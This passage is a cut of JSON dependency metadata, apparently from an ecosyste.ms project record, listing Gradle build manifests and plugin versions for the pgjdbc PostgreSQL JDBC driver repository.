"id":11146420789,"package_name":"com.github.vlsi.gradle-extensions:com.github.vlsi.gradle-extensions.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false},{"id":11146420790,"package_name":"com.github.vlsi.stage-vote-release:com.github.vlsi.stage-vote-release.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false}]},{"ecosystem":"maven","filepath":"build-logic/verification/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:15.228Z","updated_at":"2023-07-05T17:00:15.228Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build-logic/verification/build.gradle.kts","dependencies":[{"id":11146421013,"package_name":"com.github.autostyle:com.github.autostyle.gradle.plugin","ecosystem":"maven","requirements":"3.2","direct":true,"kind":"implementation","optional":false},{"id":11146421014,"package_name":"com.github.spotbugs:com.github.spotbugs.gradle.plugin","ecosystem":"maven","requirements":"5.0.14","direct":true,"kind":"implementation","optional":false},{"id":11146421117,"package_name":"com.github.vlsi.gradle-extensions:com.github.vlsi.gradle-extensions.gradle.plugin","ecosystem":"maven","requirements":"1.86","direct":true,"kind":"implementation","optional":false},{"id":11146421119,"package_name":"de.thetaphi.forbiddenapis:de.thetaphi.forbiddenapis.gradle.plugin","ecosystem":"maven","requirements":"3.4","direct":true,"kind":"implementation","optional":false},{"id":11146421621,"package_name":"net.ltgt.errorprone:net.ltgt.errorprone.gradle.plugin","ecosystem":"maven","requirements":"3.1.0","direct":true,"kind":"implementation","optional":false},{"id":11146421656,"package_name":"org.checkerframework:org.checkerframework.gradle.plugin","ecosystem":"maven","requirements":"0.6.23","direct":true,"kind":"implementation","optional":false}]},{"ecosystem":"maven","filepath":"build-logic-commons/gradle-plugin/build.gradle.kts","sha":null,"kind":"manifest","created_at":"2023-07-05T17:00:15.484Z","updated_at":"2023-07-05T17:00:15.484Z","repository_link":"https://github.com/pgjdbc/pgjdbc/blob/master/build-logic-commons/gradle-plugin/build.gradle.kts","dependencies":[{"id":11146421682,"package_name":"org.gradle.kotlin.kotlin-dsl:org.gradle.kotlin.kotlin-dsl.gradle.plugin","ecosystem":"maven","requirements":"$expectedKotlinDslPluginsVersion","direct":true,"kind":"implementation","optional":false}]}],"score":35.26360673566495,"created_at":"2025-08-29T08:46:24.435Z","updated_at":"2026-06-20T09:30:15.060Z","avatar_url":"https://github.com/pgjdbc.png","language":"Java","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/362778","html_url":"https://summary.ecosyste.ms/projects/362778"}